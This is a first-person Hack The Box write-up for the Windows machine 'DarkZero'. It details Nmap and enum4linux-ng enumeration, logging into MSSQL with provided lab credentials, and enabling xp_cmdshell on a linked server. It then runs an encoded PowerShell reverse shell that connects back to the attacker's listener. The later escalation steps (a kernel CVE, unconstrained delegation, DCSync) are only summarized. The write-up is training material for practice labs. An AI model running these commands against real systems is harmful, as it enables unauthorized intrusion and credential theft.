- Published on
Hack-The-Box - Hard - Windows - DarkZero
- AUTHORS
- NAME
- Yasir Mehmood
The DarkZero machine began with an exposed 1433/TCP port associated with Microsoft SQL Server (MSSQL). Using the provided credentials, I successfully authenticated to the MSSQL instance hosted on DC01.darkzero.htb.
During enumeration, I discovered a linked MSSQL instance on DC02.darkzero.ext. With sysadmin privileges on the original instance, I enabled xp_cmdshell, which allowed me to execute commands on DC02 and achieve lateral movement within the environment.
I then performed privilege escalation on DC02 by exploiting CVE-2024-30088, a vulnerability in the Microsoft Windows Server Kernel that enables token manipulation for local privilege escalation. This granted me administrative access and allowed me to retrieve the user.txt file from the Administrator’s desktop.
Next, I analyzed the Active Directory configuration on DC01 and identified that it was vulnerable due to Unconstrained Delegation being enabled. To exploit this misconfiguration, I coerced an authentication request from DC01 to DC02 via MSSQL and captured the Ticket Granting Ticket (TGT) using Rubeus.
Finally, I leveraged Mimikatz within a Metasploit shell to perform a DCSync attack, extracting the NTLM hash of the Administrator account on DC01. This ultimately provided full domain access and allowed me to obtain the root.txt file.
Enumeration
- I started with an initial
port scanusingNmapand found port1433/TCPto be open aside from the usual ports. - The
1433/TCPport in MicrosoftWindowsoperating systems is usually used byMicrosoft SQL Server (MSSQL)Service.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo nmap -p- 10.129.174.93 --min-rate 10000
[sudo] password for kali:
Nmap scan report for 10.129.174.93
Host is up (0.047s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49666/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49891/tcp open unknown
49908/tcp open unknown
49963/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.61 seconds
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo nmap -sC -sV 10.129.174.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 21:07 CEST
Nmap scan report for 10.129.174.93
Host is up (0.016s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 02:07:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.174.93:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.174.93:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-10-05T02:08:34+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T02:03:43
|_Not valid after: 2055-10-05T02:03:43
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-05T02:07:54
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.50 seconds
- Based on the output of the port scan, I knew that I had to deal with a
Domain Controller (DC). - To spare me the suffering later, I
synchronizedthe localtime and datewith theDC, before moving on.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo /etc/init.d/virtualbox-guest-utils stop
[sudo] password for kali:
Stopping virtualbox-guest-utils (via systemctl): virtualbox-guest-utils.service.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo systemctl stop systemd-timesyncd
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo net time set -S 10.129.174.93
- While the scan of
NmapwithDefault ScriptsandVersion Enumerationoptions were running, - The machine provided initial
credentialsas is common with Windows machines pentesting scenarios.
- I used
enum4linux-ngto have anauthenticated lookat the server.
┌──(kali@kali)-[~/opt/01_information_gathering/enum4linux-ng]
└─$ python3 enum4linux-ng.py 10.129.174.93 -u 'john.w' -p 'RFulUtONCOL!'
ENUM4LINUX - next generation (v1.3.1)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.174.93
[*] Username ......... 'john.w'
[*] Random Username .. 'mjclbkhn'
[*] Password ......... 'RFulUtONCOL!'
[*] Timeout .......... 5 second(s)
=======================================
| Listener Scan on 10.129.174.93 |
=======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
======================================================
| Domain Information via LDAP for 10.129.174.93 |
======================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: darkzero.htb
=============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.174.93 |
=============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
===========================================
| SMB Dialect Check on 10.129.174.93 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
=============================================================
| Domain Information via SMB session for 10.129.174.93 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: darkzero
DNS domain: darkzero.htb
FQDN: DC01.darkzero.htb
Derived membership: domain member
Derived domain: darkzero
===========================================
| RPC Session Check on 10.129.174.93 |
===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for user session
[+] Server allows session using username 'john.w', password 'RFulUtONCOL!'
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
=====================================================
| Domain Information via RPC for 10.129.174.93 |
=====================================================
[+] Domain: darkzero
[+] Domain SID: S-1-5-21-1152179935-589108180-1989892463
[+] Membership: domain member
=================================================
| OS Information via RPC for 10.129.174.93 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: ''
OS build: '26100'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x80102f'
Server type string: Wk Sv Sql PDC Tim NT
=======================================
| Users via RPC on 10.129.174.93 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 4 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 4 user(s) via 'enumdomusers'
[+] After merging user results we have 4 user(s) total:
'2603':
username: john.w
name: (null)
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00020011'
description: Key Distribution Center Service Account
========================================
| Groups via RPC on 10.129.174.93 |
========================================
[*] Enumerating local groups
[+] Found 6 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 17 group(s) via 'enumdomgroups'
[+] After merging groups results we have 52 group(s) total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'2601':
groupname: SQLServer2005SQLBrowserUser$DC01
type: local
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'528':
groupname: Forest Trust Accounts
type: domain
'529':
groupname: External Trust Accounts
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
'585':
groupname: OpenSSH Users
type: builtin
========================================
| Shares via RPC on 10.129.174.93 |
========================================
[*] Enumerating shares
[+] Found 5 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
NETLOGON:
comment: Logon server share
type: Disk
SYSVOL:
comment: Logon server share
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: OK
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: OK
===========================================
| Policies via RPC for 10.129.174.93 |
===========================================
[*] Trying port 445/tcp
/home/kali/opt/01_information_gathering/enum4linux-ng/enum4linux-ng.py:2686: DeprecationWarning: datetime.datetime.utcfromtimestamp() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.fromtimestamp(timestamp, datetime.UTC).
minutes = datetime.utcfromtimestamp(tmp).minute
/home/kali/opt/01_information_gathering/enum4linux-ng/enum4linux-ng.py:2687: DeprecationWarning: datetime.datetime.utcfromtimestamp() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.fromtimestamp(timestamp, datetime.UTC).
hours = datetime.utcfromtimestamp(tmp).hour
/home/kali/opt/01_information_gathering/enum4linux-ng/enum4linux-ng.py:2688: DeprecationWarning: datetime.datetime.utcfromtimestamp() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.fromtimestamp(timestamp, datetime.UTC).
time_diff = datetime.utcfromtimestamp(tmp) - datetime.utcfromtimestamp(0)
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: true
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 10 minutes
Lockout duration: 10 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
===========================================
| Printers via RPC for 10.129.174.93 |
===========================================
[+] No printers available
Completed after 12.95 seconds
- And at this point, I added
darkzero.htbandDC01.darkzero.htbto the/etc/hostsfile.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ tail -n 2 /etc/hosts
10.129.174.93 darkzero.htb
10.129.174.93 DC01.darkzero.htb
- Now, I finally moved over to port
445/TCPlooking for some low-hanging fruits.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ netexec smb 10.129.174.93 -u 'john.w' -p 'RFulUtONCOL!' --shares
SMB 10.129.174.93 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.174.93 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.174.93 445 DC01 [*] Enumerated shares
SMB 10.129.174.93 445 DC01 Share Permissions Remark
SMB 10.129.174.93 445 DC01 ----- ----------- ------
SMB 10.129.174.93 445 DC01 ADMIN$ Remote Admin
SMB 10.129.174.93 445 DC01 C$ Default share
SMB 10.129.174.93 445 DC01 IPC$ READ Remote IPC
SMB 10.129.174.93 445 DC01 NETLOGON READ Logon server share
SMB 10.129.174.93 445 DC01 SYSVOL READ Logon server share
- And since
IPC$wasreadable, I performed a quickRID Brute Forceto get a list of usernames for password spraying later.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ netexec smb 10.129.174.93 -u 'john.w' -p 'RFulUtONCOL!' --rid-brute | grep 'SidTypeUser' | awk '{ print $6 }' | awk -F '\\' '{ print $2 }'
Administrator
Guest
krbtgt
DC01$
darkzero-ext$
john.w
Initial Access
- Then, I went for the uncommon open port
1433/TCPrunningMSSQL. - Since the machine provided initial
credentials, I tried to authenticate using those and got in.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ impacket-mssqlclient 'john.w':'RFulUtONCOL!'@'dc01.darkzero.htb' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
- First, I tried to figure out how the environment was structured and searched for linked
MSSQL instances. - and surprisingly, I indeed found another instance. It was running on
DC02.darkzero.htb.
SQL (darkzero\john.w guest@master)> EXEC SP_LINKEDSERVERS;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
- Then I moved on with the
enumerationof theinstanceondc02.darkzero.htb.
SQL (darkzero\john.w guest@master)> EXEC('SELECT SYSTEM_USER') AT [DC02.darkzero.ext];
------------
dc01_sql_svc
SQL (darkzero\john.w guest@master)> EXEC('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [DC02.darkzero.ext];
-
1
Initial Access
- Now having the knowledge of being
sysadminon the second instance, I went for enablingxp_cmdshellto achievecode execution.
SQL (darkzero\john.w guest@master)> EXEC('SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''') AT [DC02.darkzero.ext];
SQL (darkzero\john.w guest@master)> EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (darkzero\john.w guest@master)> EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (darkzero\john.w guest@master)> EXEC('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
output
--------------------
darkzero-ext\svc_sql
NULL
- Now I prepared a simple
reverse shellpayload and executed it throughxp_cmdshellonDC02to get lateral movement.
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOQA3ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
SQL (darkzero\john.w guest@master)> EXEC('EXEC xp_cmdshell ''powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AOQA3ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==''') AT [DC02.darkzero.ext];
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.45] from (UNKNOWN) [10.129.174.93] 53667
PS C:\Windows\system32>
Post-Exploit Enumeration (svc_sql)
- Now after I got
initial accessonDC02, I started theenumerationof the usersvc_sql.
PS C:\Windows\system32> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
darkzero-ext\svc_sql S-1-5-21-1969715525-31638512-2552845157-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
- Within
C:\, I found thePolicy_Backup.infwhich was not really helpful in particular for now.
PS C:\> type Policy_Backup.inf
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
NewAdministratorName = "Administrator"
NewGuestName = "Guest"
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
EnableAdminAccount = 1
EnableGuestAccount = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole\SecurityLevel=4,0
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole\SetCommand=4,0
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount=1,"10"
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ForceUnlockLogon=4,0
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning=4,5
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ScRemoveOption=1,"0"
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin=4,5
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser=4,3
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption=1,""
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText=7,
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ShutdownWithoutLogon=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\UndockWithoutLogon=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures=4,0
MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\AuthenticodeEnabled=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\AuditBaseObjects=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\CrashOnAuditFail=4,0
